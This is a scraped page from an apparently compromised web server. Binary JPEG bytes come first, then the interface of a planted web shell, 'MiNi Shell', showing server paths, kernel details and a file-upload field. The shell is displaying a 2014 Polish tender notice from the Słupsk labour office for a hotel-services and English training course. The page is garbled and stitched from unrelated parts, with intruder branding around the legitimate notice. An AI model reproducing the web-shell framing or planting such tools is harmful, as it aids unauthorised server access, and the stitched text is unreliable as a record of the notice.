JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/145272-N-2014.html

<p class="kh_header"><b>Słupsk: Szkolenie: Pracownik usług hotelarskich z modułem języka angielskiego.</b><br>
<b>Numer ogłoszenia: 145272 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Leszczyńskiego 8, 76-200 Słupsk, woj. pomorskie, tel. 59 8457501, faks 59 8457500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slupsk.pup.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie: Pracownik usług hotelarskich z modułem języka angielskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla grupy 12 osób bezrobotnych, na temat: Pracownik usług hotelarskich z modułem języka angielskiego.
2.	Ilość godzin szkolenia teoretycznych i praktycznych przypadających na każdego uczestnika szkolenia: 350, w tym 100 godz. języka angielskiego, 80 godz. teorii                    i 120 godz. praktyki w hotelu/motelu.
3.	Zakres tematyczny programu szkolenia musi być zgodny z obowiązującymi przepisami i wymogami programowymi dla tego rodzaju szkolenia i musi zawierać tematykę z zakresu dot. pracownika usług hotelarskich (w tym zajęcia praktyczne                  w hotelu/motelu) oraz nauki języka angielskiego (podstawy i słownictwo ukierunkowane zawodowo).
4.	Szkolenie powinno obejmować część teoretyczną i praktyczną z wykorzystaniem standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych w bazach danych prowadzonych przez Ministra Pracy                    i Polityki Społecznej z danego zakresu (www.standardyiszkolenia.praca.gov.pl).
5.	Program szkolenia oferowany przez Wykonawcę powinien zawierać co najmniej następujące elementy: 
a)	nazwa i zakres szkolenia
b)	czas trwania i sposób organizacji szkolenia 
c)	wymagania wstępne dla uczestników szkolenia
d)	cele szkolenia
e)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,                               z uwzględnieniem części teoretycznej i części praktycznej
f)	treść szkolenia w zakresie poszczególnych zajęć edukacyjnych
g)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych 
h)	sposób sprawdzania efektów szkolenia.
6.	Szkolenie powinno odbywać się w formie kursu realizowanego wg planu nauczania, obejmującego przeciętnie nie mniej niż 25 godzin szkolenia w tygodniu. Godzina szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne licząc 45 minut oraz przerwę, liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny. 
7.	Szkolenie musi odbywać się codziennie w dni robocze, od poniedziałku do piątku                  w przedziale czasowym między godz. 8.00 a 20.00, ale nie więcej niż 8 godzin dziennie.
8.	Miejsce szkolenia: zajęcia teoretyczne - Słupsk, praktyki zawodowe - Słupsk i/lub Ustka.
9.	Wykonawca zobowiązany jest zapewnić taką ilość miejsc odbywania praktyki, aby efektywnie i bez przeszkód mogli ją w tym samym czasie odbywać wszyscy uczestnicy szkolenia.
10.	Zajęcia prowadzone muszą być za pomocą omówienia zagadnień pod nadzorem wykładowców wskazanych przez Wykonawcę w ofercie. Część praktyczna musi opierać się na samodzielnym wykonywaniu ćwiczeń przez uczestników szkolenia.
11.	Wykonawca zobowiązany jest do przeprowadzenia wewnętrznego egzaminu końcowego wg aktualnie obowiązujących przepisów prawa i wydania uczestnikom szkolenia, kończącym je z wynikiem pozytywnym stosownego zaświadczenia zgodnego z zgodnego z rozporządzeniem Ministra Edukacji Narodowej z dnia                          11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych                   (Dz. U. z 2012 r., poz. 186) wraz z suplementem zawierającym następujące informacje: 
- okres trwania szkolenia 
- tematy  i wymiar godzin zajęć edukacyjnych
oraz  numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, wraz               z podpisem osoby upoważnionej przez wykonawcę.
12.	Wykonawca zobowiązany jest:
a)	wyposażyć i przekazać na własność każdemu uczestnikowi szkolenia co najmniej następujące materiały szkoleniowe zgodne z tematyką szkolenia: zeszyt 60-cio kartkowy formatu A-5, długopis, ołówek z gumką oraz aktualny podręcznik lub skrypt z zakresu dot. hotelarstwa oraz podręcznik i ćwiczenia do nauki języka angielskiego. Materiały szkoleniowe powinny być przekazywane uczestnikom szkolenia na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć za potwierdzeniem.
b)	zapewnić i przekazać na własność odzież ochronną, co najmniej: fartuch ochronny, czepek siateczkowy na głowę, rękawiczki jednorazowe
c)	zapewnić poczęstunek w każdym dniu szkolenia w postaci: ciepłych i zimnych napojów (kawa, herbata, woda mineralna), ciastek, cukru i śmietanki.
d)	zapewnić uczestnikom szkolenia swobodny dostęp do pomieszczeń sanitarnych w budynku, w którym odbywa się szkolenie (tj. WC, umywalka wraz                          z dostępem do ciepłej wody)
e)	zapewnić uczestnikom szkolenia dostęp do niezbędnych środków czystości (tj. papier toaletowy, mydło do rąk, ręczniki papierowe lub suszarka do rąk)
f)	zapewnić miejsce zajęć praktycznych oraz salę szkoleniową o odpowiedniej powierzchni, spełniającą wymagania ergonomiczne i bhp (m. in. odpowiednie oświetlenie, wentylacja i temperatura), wyposażoną w:
- odpowiednią ilość stanowisk  (min. 12 - dla uczestników  szkolenia), 
 - tablicę kredową i/lub sucho ścieralną i/lub flipchart z zapasem kartek
- rzutnik multimedialny, ekran projekcyjny,
g)	zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków powstałych                     w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem uczestników szkolenia, którym nie przysługuje stypendium oraz którym przysługuje stypendium, o którym mowa w art. 41 ust. 3b ustawy o promocji zatrudnienia i instytucjach rynku pracy
h)	zapewnić i opłacić niezbędne wymagane badania lekarskie i sanitarno-epidemiologiczne
i)	przedłożyć Zamawiającemu harmonogram szkolenia co najmniej na 2 dni przed dniem jego rozpoczęcia
j)	opatrzyć odpowiednimi logotypami, które są dostępne na stronie internetowej www.efs.gov.pl oraz zawrzeć informację o współfinansowaniu szkolenia z EFS w materiałach szkoleniowych, dokumentach przekazywanych do zamawiającego oraz zaświadczeniach o ukończeniu szkolenia (jeśli nie ma możliwości zamieszczenia odpowiedniej informacji na certyfikatach, świadectwach czy dyplomach informacje o współfinansowaniu powinny znaleźć się na dodatkowym zaświadczeniu z informacją, że szkolenie były współfinansowane przez Europejski Fundusz Społeczny)
k)	przestrzegać zasad promocji Projektu zgodnie z wytycznymi zawartymi na stronie www.efs.gov.pl (PROMOCJA W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI 2007-2013)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.58.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli Wykonawca wykaże:
- że jest instytucją szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004 r.                o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013 r., poz. 674                    z późn. zm.), tj. posiada aktualny (na 2014 r.) wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ten warunek, jeżeli zrealizował w sposób należyty co najmniej 1 szkolenie, dla grupy 6-osobowej, z zakresu: pracownik usług hotelarskich w okresie ostatnich 3 lat przed upływem terminu składania ofert,                   a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ten warunek, jeżeli będzie dysponował podczas szkolenia:
- salą szkoleniową o odpowiedniej powierzchni, spełniającą wymagania ergonomiczne i bhp (m. in. odpowiednie oświetlenie, wentylacja i temperatura), wyposażoną w odpowiednią ilość stanowisk (min. 12 - dla uczestników      szkolenia), tablicę kredową i/lub sucho ścieralną i/lub flipchart z zapasem kartek, rzutnik multimedialny, ekran projekcyjny, 
- miejscem praktyk zawodowych w hotelach lub motelach na terenie Słupska i/lub Ustki.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ten warunek, jeżeli będzie dysponował podczas szkolenia:
kadrą posiadającą kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do prowadzenia szkoleń z zakresu objętego przedmiotem zamówienia,                        tj.;
- co najmniej 1 wykładowcą/instruktorem z doświadczeniem zawodowym                w postaci przeprowadzonych co najmniej 3 szkoleń z bloku tematycznego, który będzie realizować na kursie lub z co najmniej 2-letnim doświadczeniem jako nauczyciel/instruktor przedmiotu zawodowego zgodnego z blokiem tematycznym, który będzie realizować na kursie
- co najmniej 1 wykładowcą języka angielskiego z wykształceniem wyższym kierunkowym 
- co najmniej 1 opiekunem praktyk zawodowych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pisemne zobowiązanie (w oryginale) innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia lub inny dowód dysponowania zasobami podmiotu trzeciego - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - DOŚWIADCZENIE WYKONAWCY - 40</li>
<li>3 - POSIADANIE PRZEZ WYKONAWCĘ CERTYFIKATU JAKOŚCI USŁUG - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W szczególnie uzasadnionych przypadkach Zamawiający może wyrazić zgodę na przedłużenie terminu realizacji szkolenia, gdy będzie to podyktowane okolicznościami niezależnymi od Wykonawcy (Wykonawca zobowiązany będzie przedstawić Zamawiającemu, w terminie 3 dni od dnia powstania tych okoliczności, wyjaśnienia wraz z uzasadnieniem w formie pisemnej) lub gdy Wykonawca będzie musiał wydłużyć termin realizacji zamówienia ze względu na potrzebę udzielenia dodatkowej pomocy osobom mającym trudności w procesie nauczania (Wykonawca zobowiązany jest poinformować Zamawiającego                       o konieczności wydłużenia terminu realizacji szkolenia co najmniej na 2 dni przed planowanym pierwotnym terminem zakończenia szkolenia). Powyższa zgoda jest uprawnieniem Zamawiającego, nie zaś jego obowiązkiem.
2.	  Zamawiający może wyrazić zgodę na  zmianę miejsca przeprowadzenia szkolenia, tylko w uzasadnionych przypadkach, na które Wykonawca nie miał wpływu, pod warunkiem zapewnienia warunków szkolenia w miejscu                          o co najmniej takim samym standardzie, jak przedstawione w ofercie Wykonawcy                   i zgodny z zapisami SIWZ. Wykonawca powinien poinformować Zamawiającego na piśmie o zamiarze zmiany miejsca szkolenia z uzasadnieniem zmiany. Powyższa zgoda jest uprawnieniem Zamawiającego, nie zaś jego obowiązkiem.
3.	   Zamawiający może wyrazić zgodę na  zmianę kadry realizującej kurs w wyniku nieprzewidywalnych zdarzeń losowych w postaci śmierci lub choroby wykładowcy albo rozwiązania przez niego umowy z wykonawcą, których nie można było przewidzieć z dniu zawarcia umowy - zmiana jest możliwa pod warunkiem zapewnienia nowej kadry o co najmniej takich samych kwalifikacjach zawodowych, doświadczeniu i wykształceniu (przed dokonaniem zmiany Wykonawca powinien dostarczyć na piśmie wykaz nowej kadry z opisem jej kwalifikacji zawodowych i zakresu zadań, które będzie realizowała przy wykonywaniu zamówienia wraz z uzasadnieniem zmiany). Powyższa zgoda jest uprawnieniem Zamawiającego, nie zaś jego obowiązkiem.
4.	Zmiana oznaczenia stron zawartej umowy (np. zmiana nazwy, siedziby, osób reprezentujących Wykonawcę) oraz ukończenie szkolenia przez mniejszą liczbę osób bezrobotnych (a tym samym wysokość kwoty za osoby, które ukończyły szkolenie) nie wymaga aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.slupsk.pup.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Słupsku ul. Fabryczna 1, pok. 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2014 godzina 08:00, miejsce: Powiatowy Urząd Pracy 76-200 Słupsk ul. Leszczyńskiego 8, pok. 17 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt EUROKARIERA współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki Priorytet VI Rynek pracy otwarty dla wszystkich Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenia poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com